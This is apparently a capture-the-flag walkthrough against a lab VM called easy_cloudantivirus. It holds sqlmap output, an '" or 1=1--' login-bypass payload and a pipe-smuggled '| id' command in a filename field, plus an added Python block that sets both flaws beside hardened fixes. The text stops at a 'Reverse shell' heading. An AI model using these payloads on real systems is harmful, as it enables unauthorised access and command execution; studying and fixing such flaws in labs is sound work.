Target machine: easy_cloudantivirus (Part 2)

    ┌──(kali㉿kali)-[~/workspace]
    └─$ sqlmap -r testsql.txt -f --level 4 --risk 3
            ___
           __H__
     ___ ___[']_____ ___ ___  {1.6.10#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 15:18:43 /2022-10-23/

    [15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
    [15:18:43] [INFO] testing connection to the target URL
    [15:18:44] [INFO] testing if the target URL content is stable
    [15:18:44] [INFO] target URL content is stable
    [15:18:44] [INFO] testing if POST parameter 'password' is dynamic
    [15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
    [15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
    [15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
    [15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
    got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
    [15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
    [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 
    [15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
    it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
    [15:19:14] [INFO] testing 'Generic inline queries'
    [15:19:14] [INFO] testing 'SQLite inline queries'
    [15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
    [15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
    [15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
    [15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
    [15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable 
    [15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

  • From this output we can see that an injection point exists in the POST parameter password, and that the back-end DBMS is probably SQLite (sqlmap's extended heuristic flags it, and the SQLite-specific time-based test also succeeds).
  • The line [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable tells us the injection type: OR boolean-based blind.
  • Build the SQL injection payload. Knowing the injection type is OR boolean-based, try the fairly generic payload " or 1=1-- as the password value in the form at http://192.168.56.109:8080/ and submit it. The leading double quote closes the string literal the application wraps the password in, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the query; the double-quote variant is the one to use here because the application evidently quotes the value with " (SQLite accepts double-quoted string literals). If a target quoted with ' instead, the ' or 1=1-- form would be needed.
  • At this point we have successfully logged in and reached http://192.168.56.109:8080/scan. A little exploration shows this is the web application's back-end admin page. It accepts submitted data, and the text "Try scanning some of these files with our scanner!" tells us the submitted value is handed to some program that scans it, which most likely means it ends up being executed through the shell.
    <html><body>
    <h1>Cloud Anti-Virus Scanner!</h1>
    <h3>Try scanning some of these files with our scanner!</h3>
    <pre>
    total 4756
    -rwxr-xr-x 1 scanner scanner 1113504 Oct 21  2018 bash
    -rwxr-xr-x 1 scanner scanner   34888 Oct 21  2018 bzip2
    -rwxr-xr-x 1 scanner scanner   35064 Oct 21  2018 cat
    -rw-rw-r-- 1 scanner scanner      68 Oct 21  2018 eicar
    -rw-rw-r-- 1 scanner scanner       5 Oct 21  2018 hello
    -rwxr-xr-x 1 scanner scanner   35312 Oct 21  2018 netcat
    -rwxr-xr-x 1 scanner scanner 3633560 Oct 21  2018 python
    </pre>
    <form action="/output" method="POST">
    <input type="filename" name="filename" placeholder="File Name">
    <input type="submit" value="Scan!">
    </form>
    </body></html>

    The form posts a filename parameter to /output, and the listing looks like the output of ls -l on the scanner's sample directory, so the submitted name is most likely placed on a command line. We can try using the | pipe to chain a second command onto it, changing the returned content and mixing in the information we want.
    • Submitting a | id as the filename returns the result below. The id output comes back in the response, which shows the input is not filtered and we can execute arbitrary commands through it, as the scanner user:
      uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
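    The following Python is an added example, not code from the easy_cloudantivirus VM or from this walkthrough. It models the two flaws just exploited, a login query built by string concatenation into SQLite and a scanner that splices the filename into a shell command, and puts the hardened form beside each. Everything specific is an assumption: the table and column name users(password), the double-quoted concatenation (implied by the " or 1=1-- payload working), the invite code stored in the table, and wc -c standing in for whatever scanner binary the real application runs. The sample file is constructed in a temporary directory so the block runs offline.

```python
"""Added example: SQLite login injection and shell command injection, each
beside a hardened version. Not the VM's code; all names are assumptions."""
import os
import re
import sqlite3
import subprocess
import tempfile

SECRET = "constructed-invite-code"  # constructed sample credential, not the VM's


def make_db():
    """In-memory SQLite with one row. The schema users(password) is assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (password TEXT)")
    conn.execute("INSERT INTO users VALUES (?)", (SECRET,))
    return conn


def login_vulnerable(conn, password):
    """String concatenation with double quotes, as the working payload implies.
    SQLite falls back to treating an unresolvable double-quoted identifier as a
    string literal, so  " or 1=1--  closes the literal, appends OR 1=1 and
    comments out the trailing quote."""
    query = f'SELECT 1 FROM users WHERE password = "{password}"'
    return conn.execute(query).fetchone() is not None


def login_fixed(conn, password):
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE password = ?", (password,)).fetchone()
    return row is not None


def scan_vulnerable(samples_dir, filename):
    """The name is spliced into a shell command line, so `|` chains a second
    command whose stdout replaces the scanner's output (wc -c is a stand-in)."""
    cmd = f"wc -c {os.path.join(samples_dir, filename)}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=False)
    return proc.stdout


SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def scan_fixed(samples_dir, filename):
    """Allow-list the name, confine it to the samples directory, and pass an
    argv list with no shell so metacharacters carry no meaning."""
    if not SAFE_NAME.match(filename) or filename in (".", ".."):
        raise ValueError("invalid file name")
    path = os.path.realpath(os.path.join(samples_dir, filename))
    if os.path.dirname(path) != os.path.realpath(samples_dir) or not os.path.isfile(path):
        raise ValueError("file not found")
    proc = subprocess.run(["wc", "-c", path], capture_output=True, text=True, check=True)
    return proc.stdout


def demo():
    """Run the walkthrough's two payloads against the vulnerable and fixed forms."""
    conn = make_db()
    results = {
        "sqli_vulnerable": login_vulnerable(conn, '" or 1=1--'),
        "sqli_fixed": login_fixed(conn, '" or 1=1--'),
        # same payload with the wrong quote style: just a string that matches nothing
        "sqli_wrong_quote": login_vulnerable(conn, "' or 1=1--"),
    }
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "hello"), "w") as f:
            f.write("hello")  # constructed stand-in for the VM's 5-byte 'hello' file
        # `a | id` on the VM; `echo` here so the block runs anywhere
        results["cmdi_vulnerable"] = scan_vulnerable(d, "a | echo INJECTED").strip()
        try:
            scan_fixed(d, "a | echo INJECTED")
            results["cmdi_fixed"] = "ran"
        except ValueError as e:
            results["cmdi_fixed"] = str(e)
        results["scan_ok"] = scan_fixed(d, "hello").split()[0]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    The two fixes are independent: binding the password as a parameter closes the login bypass, and the argv-list call with an allow-listed, directory-confined name closes the command injection even if the scanner binary itself is unchanged. The wrong-quote case is there to show why the walkthrough's payload starts with a double quote rather than a single one.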
    Reverse shell